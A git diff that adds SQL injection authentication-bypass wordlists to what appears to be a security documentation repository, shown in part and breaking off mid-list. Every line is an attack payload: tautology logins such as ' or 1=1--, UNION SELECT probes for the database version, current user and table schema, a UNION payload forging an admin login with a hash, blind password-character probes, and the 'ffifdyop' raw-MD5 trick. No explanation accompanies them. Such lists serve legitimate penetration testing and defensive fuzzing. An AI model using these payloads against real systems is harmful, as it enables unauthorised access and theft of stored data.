+or 1=1
+or 1=1--
+or 1=1#
+or 1=1/*
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
+==
+=
+'
+' --
+' #
+' –
+'--
+'/*
+'#
+" --
+" #
+"/*
+' and 1='1
+' and a='a
+ or 1=1
+ or true
+' or ''='
+" or ""="
+1′) and '1′='1–
+' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
+" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
+ and 1=1
+ and 1=1–
+' and 'one'='one
+' and 'one'='one–
+' group by password having 1=1--
+' group by userid having 1=1--
+' group by username having 1=1--
+ like '%'
+ or 0=0 --
+ or 0=0 #
+ or 0=0 –
+' or         0=0 #
+' or 0=0 --
+' or 0=0 #
+' or 0=0 –
+" or 0=0 --
+" or 0=0 #
+" or 0=0 –
+%' or '0'='0
+ or 1=1
+ or 1=1--
+ or 1=1/*
+ or 1=1#
+ or 1=1–
+' or 1=1--
+' or '1'='1
+' or '1'='1'--
+' or '1'='1'/*
+' or '1'='1'#
+' or '1′='1
+' or 1=1
+' or 1=1 --
+' or 1=1 –
+' or 1=1--
+' or 1=1;#
+' or 1=1/*
+' or 1=1#
+' or 1=1–
+') or '1'='1
+') or '1'='1--
+') or '1'='1'--
+') or '1'='1'/*
+') or '1'='1'#
+') or ('1'='1
+') or ('1'='1--
+') or ('1'='1'--
+') or ('1'='1'/*
+') or ('1'='1'#
+'or'1=1
+'or'1=1′
+" or "1"="1
+" or "1"="1"--
+" or "1"="1"/*
+" or "1"="1"#
+" or 1=1
+" or 1=1 --
+" or 1=1 –
+" or 1=1--
+" or 1=1/*
+" or 1=1#
+" or 1=1–
+") or "1"="1
+") or "1"="1"--
+") or "1"="1"/*
+") or "1"="1"#
+") or ("1"="1
+") or ("1"="1"--
+") or ("1"="1"/*
+") or ("1"="1"#
+) or '1′='1–
+) or ('1′='1–
+' or 1=1 LIMIT 1;#
+'or 1=1 or ''='
+"or 1=1 or ""="
+' or 'a'='a
+' or a=a--
+' or a=a–
+') or ('a'='a
+" or "a"="a
+") or ("a"="a
+') or ('a'='a and hi") or ("a"="a
+' or 'one'='one
+' or 'one'='one–
+' or uid like '%
+' or uname like '%
+' or userid like '%
+' or user like '%
+' or username like '%
+' or 'x'='x
+') or ('x'='x
+" or "x"="x
+' OR 'x'='x'#;
+'=' 'or' and '=' 'or'
+' UNION ALL SELECT 1, @@version;#
+' UNION ALL SELECT system_user(),user();#
+' UNION select table_schema,table_name FROM information_Schema.tables;#
+admin' and substring(password/text(),1,1)='7
+' and substring(password/text(),1,1)='7
+
+==
+=
+'
+"
+'-- 2
+'/*
+'#
+"-- 2
+" #
+"/*
+'-'
+'&'
+'^'
+'*'
+'='
+0'<'2
+"-"
+"&"
+"^"
+"*"
+"="
+0"<"2
+
+')
+")
+')-- 2
+')/*
+')#
+")-- 2
+") #
+")/*
+')-('
+')&('
+')^('
+')*('
+')=('
+0')<('2
+")-("
+")&("
+")^("
+")*("
+")=("
+0")<("2
+
+'-''-- 2
+'-''#
+'-''/*
+'&''-- 2
+'&''#
+'&''/*
+'^''-- 2
+'^''#
+'^''/*
+'*''-- 2
+'*''#
+'*''/*
+'=''-- 2
+'=''#
+'=''/*
+0'<'2'-- 2
+0'<'2'#
+0'<'2'/*
+"-""-- 2
+"-""#
+"-""/*
+"&""-- 2
+"&""#
+"&""/*
+"^""-- 2
+"^""#
+"^""/*
+"*""-- 2
+"*""#
+"*""/*
+"=""-- 2
+"=""#
+"=""/*
+0"<"2"-- 2
+0"<"2"#
+0"<"2"/*
+
+')-''-- 2
+')-''#
+')-''/*
+')&''-- 2
+')&''#
+')&''/*
+')^''-- 2
+')^''#
+')^''/*
+')*''-- 2
+')*''#
+')*''/*
+')=''-- 2
+')=''#
+')=''/*
+0')<'2'-- 2
+0')<'2'#
+0')<'2'/*
+")-""-- 2
+")-""#
+")-""/*
+")&""-- 2
+")&""#
+")&""/*
+")^""-- 2
+")^""#
+")^""/*
+")*""-- 2
+")*""#
+")*""/*
+")=""-- 2
+")=""#
+")=""/*
+0")<"2-- 2
+0")<"2#
+0")<"2/*
+
+
+'oR'2
+'oR'2'-- 2
+'oR'2'#
+'oR'2'/*
+'oR'2'oR'
+'oR(2)-- 2
+'oR(2)#
+'oR(2)/*
+'oR(2)oR'
+'oR 2-- 2
+'oR 2#
+'oR 2/*
+'oR 2 oR'
+'oR/**/2-- 2
+'oR/**/2#
+'oR/**/2/*
+'oR/**/2/**/oR'
+"oR"2
+"oR"2"-- 2
+"oR"2"#
+"oR"2"/*
+"oR"2"oR"
+"oR(2)-- 2
+"oR(2)#
+"oR(2)/*
+"oR(2)oR"
+"oR 2-- 2
+"oR 2#
+"oR 2/*
+"oR 2 oR"
+"oR/**/2-- 2
+"oR/**/2#
+"oR/**/2/*
+"oR/**/2/**/oR"
+
+'oR'2'='2
+'oR'2'='2'oR'
+'oR'2'='2'-- 2
+'oR'2'='2'#
+'oR'2'='2'/*
+'oR'2'='2'oR'
+'oR 2=2-- 2
+'oR 2=2#
+'oR 2=2/*
+'oR 2=2 oR'
+'oR/**/2=2-- 2
+'oR/**/2=2#
+'oR/**/2=2/*
+'oR/**/2=2/**/oR'
+'oR(2)=2-- 2
+'oR(2)=2#
+'oR(2)=2/*
+'oR(2)=2/*
+'oR(2)=(2)oR'
+'oR'2'='2' LimIT 1-- 2
+'oR'2'='2' LimIT 1#
+'oR'2'='2' LimIT 1/*
+'oR(2)=(2)LimIT(1)-- 2
+'oR(2)=(2)LimIT(1)#
+'oR(2)=(2)LimIT(1)/*
+"oR"2"="2
+"oR"2"="2"oR"
+"oR"2"="2"-- 2
+"oR"2"="2"#
+"oR"2"="2"/*
+"oR"2"="2"oR"
+"oR 2=2-- 2
+"oR 2=2#
+"oR 2=2/*
+"oR 2=2 oR"
+"oR/**/2=2-- 2
+"oR/**/2=2#
+"oR/**/2=2/*
+"oR/**/2=2/**/oR"
+"oR(2)=2-- 2
+"oR(2)=2#
+"oR(2)=2/*
+"oR(2)=2/*
+"oR(2)=(2)oR"
+"oR"2"="2" LimIT 1-- 2
+"oR"2"="2" LimIT 1#
+"oR"2"="2" LimIT 1/*
+"oR(2)=(2)LimIT(1)-- 2
+"oR(2)=(2)LimIT(1)#
+"oR(2)=(2)LimIT(1)/*
+
+'oR true-- 2
+'oR true#
+'oR true/*
+'oR true oR'
+'oR(true)-- 2
+'oR(true)#
+'oR(true)/*
+'oR(true)oR'
+'oR/**/true-- 2
+'oR/**/true#
+'oR/**/true/*
+'oR/**/true/**/oR'
+"oR true-- 2
+"oR true#
+"oR true/*
+"oR true oR"
+"oR(true)-- 2
+"oR(true)#
+"oR(true)/*
+"oR(true)oR"
+"oR/**/true-- 2
+"oR/**/true#
+"oR/**/true/*
+"oR/**/true/**/oR"
+
+'oR'2'LiKE'2
+'oR'2'LiKE'2'-- 2
+'oR'2'LiKE'2'#
+'oR'2'LiKE'2'/*
+'oR'2'LiKE'2'oR'
+'oR(2)LiKE(2)-- 2
+'oR(2)LiKE(2)#
+'oR(2)LiKE(2)/*
+'oR(2)LiKE(2)oR'
+"oR"2"LiKE"2
+"oR"2"LiKE"2"-- 2
+"oR"2"LiKE"2"#
+"oR"2"LiKE"2"/*
+"oR"2"LiKE"2"oR"
+"oR(2)LiKE(2)-- 2
+"oR(2)LiKE(2)#
+"oR(2)LiKE(2)/*
+"oR(2)LiKE(2)oR"
+
+admin
+admin'-- 2
+admin'#
+admin'/*
+admin"-- 2
+admin"#
+ffifdyop
+
+' UniON SElecT 1,2-- 2
+' UniON SElecT 1,2,3-- 2
+' UniON SElecT 1,2,3,4-- 2
+' UniON SElecT 1,2,3,4,5-- 2
+' UniON SElecT 1,2#
+' UniON SElecT 1,2,3#
+' UniON SElecT 1,2,3,4#
+' UniON SElecT 1,2,3,4,5#
+'UniON(SElecT(1),2)-- 2
+'UniON(SElecT(1),2,3)-- 2
+'UniON(SElecT(1),2,3,4)-- 2
+'UniON(SElecT(1),2,3,4,5)-- 2
+'UniON(SElecT(1),2)#
+'UniON(SElecT(1),2,3)#
+'UniON(SElecT(1),2,3,4)#
+'UniON(SElecT(1),2,3,4,5)#
+" UniON SElecT 1,2-- 2
+" UniON SElecT 1,2,3-- 2
+" UniON SElecT 1,2,3,4-- 2
+" UniON SElecT 1,2,3,4,5-- 2
+" UniON SElecT 1,2#
+" UniON SElecT 1,2,3#
+" UniON SElecT 1,2,3,4#
+" UniON SElecT 1,2,3,4,5#
+"UniON(SElecT(1),2)-- 2
+"UniON(SElecT(1),2,3)-- 2
+"UniON(SElecT(1),2,3,4)-- 2
+"UniON(SElecT(1),2,3,4,5)-- 2
+"UniON(SElecT(1),2)#
+"UniON(SElecT(1),2,3)#
+"UniON(SElecT(1),2,3,4)#
+"UniON(SElecT(1),2,3,4,5)#
+
+'||'2
+'||2-- 2
+'||'2'||'
+'||2#
+'||2/*
+'||2||'
+"||"2
+"||2-- 2
+"||"2"||"
+"||2#
+"||2/*
+"||2||"
+'||'2'='2
+'||'2'='2'||'
+'||2=2-- 2
+'||2=2#
+'||2=2/*
+'||2=2||'
+"||"2"="2
+"||"2"="2"||"
+"||2=2-- 2
+"||2=2#
+"||2=2/*
+"||2=2||"
+'||2=(2)LimIT(1)-- 2
+'||2=(2)LimIT(1)#
+'||2=(2)LimIT(1)/*
+"||2=(2)LimIT(1)-- 2
+"||2=(2)LimIT(1)#
+"||2=(2)LimIT(1)/*
+'||true-- 2
+'||true#
+'||true/*
+'||true||'
+"||true-- 2
+"||true#
+"||true/*
+"||true||"
+'||'2'LiKE'2
+'||'2'LiKE'2'-- 2
+'||'2'LiKE'2'#
+'||'2'LiKE'2'/*
+'||'2'LiKE'2'||'
+'||(2)LiKE(2)-- 2
+'||(2)LiKE(2)#
+'||(2)LiKE(2)/*
+'||(2)LiKE(2)||'
+"||"2"LiKE"2
+"||"2"LiKE"2"-- 2
+"||"2"LiKE"2"#
+"||"2"LiKE"2"/*
+"||"2"LiKE"2"||"
+"||(2)LiKE(2)-- 2
+"||(2)LiKE(2)#
+"||(2)LiKE(2)/*
+"||(2)LiKE(2)||"
+
+')oR('2
+')oR'2'-- 2
+')oR'2'#
+')oR'2'/*
+')oR'2'oR('
+')oR(2)-- 2
+')oR(2)#
+')oR(2)/*
+')oR(2)oR('
+')oR 2-- 2
+')oR 2#
+')oR 2/*
+')oR 2 oR('
+')oR/**/2-- 2
+')oR/**/2#
+')oR/**/2/*
+')oR/**/2/**/oR('
+")oR("2
+")oR"2"-- 2
+")oR"2"#
+")oR"2"/*
+")oR"2"oR("
+")oR(2)-- 2
+")oR(2)#
+")oR(2)/*
+")oR(2)oR("
+")oR 2-- 2
+")oR 2#
+")oR 2/*
+")oR 2 oR("
+")oR/**/2-- 2
+")oR/**/2#
+")oR/**/2/*
+")oR/**/2/**/oR("
+')oR'2'=('2
+')oR'2'='2'oR('
+')oR'2'='2'-- 2
+')oR'2'='2'#
+')oR'2'='2'/*
+')oR'2'='2'oR('
+')oR 2=2-- 2
+')oR 2=2#
+')oR 2=2/*
+')oR 2=2 oR('
+')oR/**/2=2-- 2
+')oR/**/2=2#
+')oR/**/2=2/*
+')oR/**/2=2/**/oR('
+')oR(2)=2-- 2
+')oR(2)=2#
+')oR(2)=2/*
+')oR(2)=2/*
+')oR(2)=(2)oR('
+')oR'2'='2' LimIT 1-- 2
+')oR'2'='2' LimIT 1#
+')oR'2'='2' LimIT 1/*
+')oR(2)=(2)LimIT(1)-- 2
+')oR(2)=(2)LimIT(1)#
+')oR(2)=(2)LimIT(1)/*
+")oR"2"=("2
+")oR"2"="2"oR("
+")oR"2"="2"-- 2
+")oR"2"="2"#
+")oR"2"="2"/*
+")oR"2"="2"oR("
+")oR 2=2-- 2
+")oR 2=2#
+")oR 2=2/*
+")oR 2=2 oR("
+")oR/**/2=2-- 2
+")oR/**/2=2#
+")oR/**/2=2/*
+")oR/**/2=2/**/oR("
+")oR(2)=2-- 2
+")oR(2)=2#
+")oR(2)=2/*
+")oR(2)=2/*
+")oR(2)=(2)oR("
+")oR"2"="2" LimIT 1-- 2
+")oR"2"="2" LimIT 1#
+")oR"2"="2" LimIT 1/*
+")oR(2)=(2)LimIT(1)-- 2
+")oR(2)=(2)LimIT(1)#
+")oR(2)=(2)LimIT(1)/*
+')oR true-- 2
+')oR true#
+')oR true/*
+')oR true oR('
+')oR(true)-- 2
+')oR(true)#
+')oR(true)/*
+')oR(true)oR('
+')oR/**/true-- 2
+')oR/**/true#
+')oR/**/true/*
+')oR/**/true/**/oR('
+")oR true-- 2
+")oR true#
+")oR true/*
+")oR true oR("
+")oR(true)-- 2
+")oR(true)#
+")oR(true)/*
+")oR(true)oR("
+")oR/**/true-- 2
+")oR/**/true#
+")oR/**/true/*
+")oR/**/true/**/oR("
+')oR'2'LiKE('2
+')oR'2'LiKE'2'-- 2
+')oR'2'LiKE'2'#
+')oR'2'LiKE'2'/*
+')oR'2'LiKE'2'oR('
+')oR(2)LiKE(2)-- 2
+')oR(2)LiKE(2)#
+')oR(2)LiKE(2)/*
+')oR(2)LiKE(2)oR('
+")oR"2"LiKE("2
+")oR"2"LiKE"2"-- 2
+")oR"2"LiKE"2"#
+")oR"2"LiKE"2"/*
+")oR"2"LiKE"2"oR("
+")oR(2)LiKE(2)-- 2
+")oR(2)LiKE(2)#
+")oR(2)LiKE(2)/*
+")oR(2)LiKE(2)oR("
+admin')-- 2
+admin')#
+admin')/*
+admin")-- 2
+admin")#
+') UniON SElecT 1,2-- 2
+') UniON SElecT 1,2,3-- 2
+') UniON SElecT 1,2,3,4-- 2
+') UniON SElecT 1,2,3,4,5-- 2
+') UniON SElecT 1,2#
+') UniON SElecT 1,2,3#
+') UniON SElecT 1,2,3,4#
+') UniON SElecT 1,2,3,4,5#
+')UniON(SElecT(1),2)-- 2
+')UniON(SElecT(1),2,3)-- 2
+')UniON(SElecT(1),2,3,4)-- 2
+')UniON(SElecT(1),2,3,4,5)-- 2
+')UniON(SElecT(1),2)#
+')UniON(SElecT(1),2,3)#
+')UniON(SElecT(1),2,3,4)#
+')UniON(SElecT(1),2,3,4,5)#
+") UniON SElecT 1,2-- 2
+") UniON SElecT 1,2,3-- 2
+") UniON SElecT 1,2,3,4-- 2
+") UniON SElecT 1,2,3,4,5-- 2
+") UniON SElecT 1,2#
+") UniON SElecT 1,2,3#
+") UniON SElecT 1,2,3,4#
+") UniON SElecT 1,2,3,4,5#
+")UniON(SElecT(1),2)-- 2
+")UniON(SElecT(1),2,3)-- 2
+")UniON(SElecT(1),2,3,4)-- 2
+")UniON(SElecT(1),2,3,4,5)-- 2
+")UniON(SElecT(1),2)#
+")UniON(SElecT(1),2,3)#
+")UniON(SElecT(1),2,3,4)#
+")UniON(SElecT(1),2,3,4,5)#
+')||('2
+')||2-- 2
+')||'2'||('
+')||2#
+')||2/*
+')||2||('
+")||("2
+")||2-- 2
+")||"2"||("
+")||2#
+")||2/*
+")||2||("
+')||'2'=('2
+')||'2'='2'||('
+')||2=2-- 2
+')||2=2#
+')||2=2/*
+')||2=2||('
+")||"2"=("2
+")||"2"="2"||("
+")||2=2-- 2
+")||2=2#
+")||2=2/*
+")||2=2||("
+')||2=(2)LimIT(1)-- 2
+')||2=(2)LimIT(1)#
+')||2=(2)LimIT(1)/*
+")||2=(2)LimIT(1)-- 2
+")||2=(2)LimIT(1)#
+")||2=(2)LimIT(1)/*
+')||true-- 2
+')||true#
+')||true/*
+')||true||('
+")||true-- 2
+")||true#
+")||true/*
+")||true||("
+')||'2'LiKE('2
+')||'2'LiKE'2'-- 2
+')||'2'LiKE'2'#
+')||'2'LiKE'2'/*
+')||'2'LiKE'2'||('
+')||(2)LiKE(2)-- 2
+')||(2)LiKE(2)#
+')||(2)LiKE(2)/*
+')||(2)LiKE(2)||('
+")||"2"LiKE("2
+")||"2"LiKE"2"-- 2
+")||"2"LiKE"2"#
+")||"2"LiKE"2"/*
+")||"2"LiKE"2"||("
+")||(2)LiKE(2)-- 2
+")||(2)LiKE(2)#
+")||(2)LiKE(2)/*
+")||(2)LiKE(2)||("
+' UnION SELeCT 1,2`
+' UnION SELeCT 1,2,3`
+' UnION SELeCT 1,2,3,4`
+' UnION SELeCT 1,2,3,4,5`
+" UnION SELeCT 1,2`
+" UnION SELeCT 1,2,3`
+" UnION SELeCT 1,2,3,4`
+" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/.gitbook/assets/sqli-authbypass-small.txt b/.gitbook/assets/sqli-authbypass-small.txt
new file mode 100644
index 00000000..331068b4
--- /dev/null
+++ b/.gitbook/assets/sqli-authbypass-small.txt
@@ -0,0 +1,197 @@
+'-'
+' '
+'&'
+'^'
+'*'
+' or ''-'
+' or '' '
+' or ''&'
+' or ''^'
+' or ''*'
+"-"
+" "
+"&"
+"^"
+"*"
+" or ""-"
+" or "" "
+" or ""&"
+" or ""^"
+" or ""*"
+or true--
+" or true--
+' or true--
+") or true--
+') or true--
+' or 'x'='x
+') or ('x')=('x
+')) or (('x'))=(('x
+" or "x"="x
+") or ("x")=("x
+")) or (("x"))=(("x
+or 1=1
+or 1=1--
+or 1=1#
+or 1=1/*
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
+==
+=
+'
+' --
+' #
+' –
+'--
+'/*
+'#
+" --
+" #
+"/*
+' and 1='1
+' and a='a
+ or 1=1
+ or true
+' or ''='
+" or ""="
+1′) and '1′='1–
+' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
+" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
+ and 1=1
+ and 1=1–
+' and 'one'='one
+' and 'one'='one–
+' group by password having 1=1--
+' group by userid having 1=1--
+' group by username having 1=1--
+ like '%'
+ or 0=0 --
+ or 0=0 #
+ or 0=0 –
+' or         0=0 #
+' or 0=0 --
+' or 0=0 #
+' or 0=0 –
+" or 0=0 --
+" or 0=0 #
+" or 0=0 –
+%' or '0'='0
+ or 1=1
+ or 1=1--
+ or 1=1/*
+ or 1=1#
+ or 1=1–
+' or 1=1--
+' or '1'='1
+' or '1'='1'--
+' or '1'='1'/*
+' or '1'='1'#
+' or '1′='1
+' or 1=1
+' or 1=1 --
+' or 1=1 –
+' or 1=1--
+' or 1=1;#
+' or 1=1/*
+' or 1=1#
+' or 1=1–
+') or '1'='1
+') or '1'='1--
+') or '1'='1'--
+') or '1'='1'/*
+') or '1'='1'#
+') or ('1'='1
+') or ('1'='1--
+') or ('1'='1'--
+') or ('1'='1'/*
+') or ('1'='1'#
+'or'1=1
+'or'1=1′
+" or "1"="1
+" or "1"="1"--
+" or "1"="1"/*
+" or "1"="1"#
+" or 1=1
+" or 1=1 --
+" or 1=1 –
+" or 1=1--
+" or 1=1/*
+" or 1=1#
+" or 1=1–
+") or "1"="1
+") or "1"="1"--
+") or "1"="1"/*
+") or "1"="1"#
+") or ("1"="1
+") or ("1"="1"--
+") or ("1"="1"/*
+") or ("1"="1"#
+) or '1′='1–
+) or ('1′='1–
+' or 1=1 LIMIT 1;#
+'or 1=1 or ''='
+"or 1=1 or ""="
+' or 'a'='a
+' or a=a--
+' or a=a–
+') or ('a'='a
+" or "a"="a
+") or ("a"="a
+') or ('a'='a and hi") or ("a"="a
+' or 'one'='one
+' or 'one'='one–
+' or uid like '%
+' or uname like '%
+' or userid like '%
+' or user like '%
+' or username like '%
+' or 'x'='x
+') or ('x'='x
+" or "x"="x
+' OR 'x'='x'#;
+'=' 'or' and '=' 'or'
+' UNION ALL SELECT 1, @@version;#
+' UNION ALL SELECT system_user(),user();#
+' UNION select table_schema,table_name FROM information_Schema.tables;#
+admin' and substring(password/text(),1,1)='7
+' and substring(password/text(),1,1)='7
+ffifdyop
\ No newline at end of file
diff --git a/.gitbook/assets/sqli-authbypass.txt b/.gitbook/assets/sqli-authbypass.txt
new file mode 100644
index 00000000..5a03da57
--- /dev/null
+++ b/.gitbook/assets/sqli-authbypass.txt
@@ -0,0 +1,771 @@
+'-'
+' '
+'&'
+'^'
+'*'
+' or ''-'
+' or '' '
+' or ''&'
+' or ''^'
+' or ''*'
+"-"
+" "
+"&"
+"^"
+"*"
+" or ""-"
+" or "" "
+" or ""&"
+" or ""^"
+" or ""*"
+or true--
+" or true--
+' or true--
+") or true--
+') or true--
+' or 'x'='x
+') or ('x')=('x
+')) or (('x'))=(('x
+" or "x"="x
+") or ("x")=("x
+")) or (("x"))=(("x
+or 1=1
+or 1=1--
+or 1=1#
+or 1=1/*
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
+==
+=
+'
+' --
+' #
+' –
+'--
+'/*
+'#
+" --
+" #
+"/*
+' and 1='1
+' and a='a
+ or 1=1
+ or true
+' or ''='
+" or ""="
+1′) and '1′='1–
+' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
+" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
+ and 1=1
+ and 1=1–
+' and 'one'='one
+' and 'one'='one–
+' group by password having 1=1--
+' group by userid having 1=1--
+' group by username having 1=1--
+ like '%'
+ or 0=0 --
+ or 0=0 #
+ or 0=0 –
+' or         0=0 #
+' or 0=0 --
+' or 0=0 #
+' or 0=0 –
+" or 0=0 --
+" or 0=0 #
+" or 0=0 –
+%' or '0'='0
+ or 1=1
+ or 1=1--
+ or 1=1/*
+ or 1=1#
+ or 1=1–
+' or 1=1--
+' or '1'='1
+' or '1'='1'--
+' or '1'='1'/*
+' or '1'='1'#
+' or '1′='1
+' or 1=1
+' or 1=1 --
+' or 1=1 –
+' or 1=1--
+' or 1=1;#
+' or 1=1/*
+' or 1=1#
+' or 1=1–
+') or '1'='1
+') or '1'='1--
+') or '1'='1'--
+') or '1'='1'/*
+') or '1'='1'#
+') or ('1'='1
+') or ('1'='1--
+') or ('1'='1'--
+') or ('1'='1'/*
+') or ('1'='1'#
+'or'1=1
+'or'1=1′
+" or "1"="1
+" or "1"="1"--
+" or "1"="1"/*
+" or "1"="1"#
+" or 1=1
+" or 1=1 --
+" or 1=1 –
+" or 1=1--
+" or 1=1/*
+" or 1=1#
+" or 1=1–
+") or "1"="1
+") or "1"="1"--
+") or "1"="1"/*
+") or "1"="1"#
+") or ("1"="1
+") or ("1"="1"--
+") or ("1"="1"/*
+") or ("1"="1"#
+) or '1′='1–
+) or ('1′='1–
+' or 1=1 LIMIT 1;#
+'or 1=1 or ''='
+"or 1=1 or ""="
+' or 'a'='a
+' or a=a--
+' or a=a–
+') or ('a'='a
+" or "a"="a
+") or ("a"="a
+') or ('a'='a and hi") or ("a"="a
+' or 'one'='one
+' or 'one'='one–
+' or uid like '%
+' or uname like '%
+' or userid like '%
+' or user like '%
+' or username like '%
+' or 'x'='x
+') or ('x'='x
+" or "x"="x
+' OR 'x'='x'#;
+'=' 'or' and '=' 'or'
+' UNION ALL SELECT 1, @@version;#
+' UNION ALL SELECT system_user(),user();#
+' UNION select table_schema,table_name FROM information_Schema.tables;#
+admin' and substring(password/text(),1,1)='7
+' and substring(password/text(),1,1)='7
+
+==
+=
+'
+"
+'-- 2
+'/*
+'#
+"-- 2
+" #
+"/*
+'-'
+'&'
+'^'
+'*'
+'='
+0'<'2
+"-"
+"&"
+"^"
+"*"
+"="
+0"<"2
+
+')
+")
+')-- 2
+')/*
+')#
+")-- 2
+") #
+")/*
+')-('
+')&('
+')^('
+')*('
+')=('
+0')<('2
+")-("
+")&("
+")^("
+")*("
+")=("
+0")<("2
+
+'-''-- 2
+'-''#
+'-''/*
+'&''-- 2
+'&''#
+'&''/*
+'^''-- 2
+'^''#
+'^''/*
+'*''-- 2
+'*''#
+'*''/*
+'=''-- 2
+'=''#
+'=''/*
+0'<'2'-- 2
+0'<'2'#
+0'<'2'/*
+"-""-- 2
+"-""#
+"-""/*
+"&""-- 2
+"&""#
+"&""/*
+"^""-- 2
+"^""#
+"^""/*
+"*""-- 2
+"*""#
+"*""/*
+"=""-- 2
+"=""#
+"=""/*
+0"<"2"-- 2
+0"<"2"#
+0"<"2"/*
+
+')-''-- 2
+')-''#
+')-''/*
+')&''-- 2
+')&''#
+')&''/*
+')^''-- 2
+')^''#
+')^''/*
+')*''-- 2
+')*''#
+')*''/*
+')=''-- 2
+')=''#
+')=''/*
+0')<'2'-- 2
+0')<'2'#
+0')<'2'/*
+")-""-- 2
+")-""#
+")-""/*
+")&""-- 2
+")&""#
+")&""/*
+")^""-- 2
+")^""#
+")^""/*
+")*""-- 2
+")*""#
+")*""/*
+")=""-- 2
+")=""#
+")=""/*
+0")<"2-- 2
+0")<"2#
+0")<"2/*
+
+
+'oR'2
+'oR'2'-- 2
+'oR'2'#
+'oR'2'/*
+'oR'2'oR'
+'oR(2)-- 2
+'oR(2)#
+'oR(2)/*
+'oR(2)oR'
+'oR 2-- 2
+'oR 2#
+'oR 2/*
+'oR 2 oR'
+'oR/**/2-- 2
+'oR/**/2#
+'oR/**/2/*
+'oR/**/2/**/oR'
+"oR"2
+"oR"2"-- 2
+"oR"2"#
+"oR"2"/*
+"oR"2"oR"
+"oR(2)-- 2
+"oR(2)#
+"oR(2)/*
+"oR(2)oR"
+"oR 2-- 2
+"oR 2#
+"oR 2/*
+"oR 2 oR"
+"oR/**/2-- 2
+"oR/**/2#
+"oR/**/2/*
+"oR/**/2/**/oR"
+
+'oR'2'='2
+'oR'2'='2'oR'
+'oR'2'='2'-- 2
+'oR'2'='2'#
+'oR'2'='2'/*
+'oR'2'='2'oR'
+'oR 2=2-- 2
+'oR 2=2#
+'oR 2=2/*
+'oR 2=2 oR'
+'oR/**/2=2-- 2
+'oR/**/2=2#
+'oR/**/2=2/*
+'oR/**/2=2/**/oR'
+'oR(2)=2-- 2
+'oR(2)=2#
+'oR(2)=2/*
+'oR(2)=2/*
+'oR(2)=(2)oR'
+'oR'2'='2' LimIT 1-- 2
+'oR'2'='2' LimIT 1#
+'oR'2'='2' LimIT 1/*
+'oR(2)=(2)LimIT(1)-- 2
+'oR(2)=(2)LimIT(1)#
+'oR(2)=(2)LimIT(1)/*
+"oR"2"="2
+"oR"2"="2"oR"
+"oR"2"="2"-- 2
+"oR"2"="2"#
+"oR"2"="2"/*
+"oR"2"="2"oR"
+"oR 2=2-- 2
+"oR 2=2#
+"oR 2=2/*
+"oR 2=2 oR"
+"oR/**/2=2-- 2
+"oR/**/2=2#
+"oR/**/2=2/*
+"oR/**/2=2/**/oR"
+"oR(2)=2-- 2
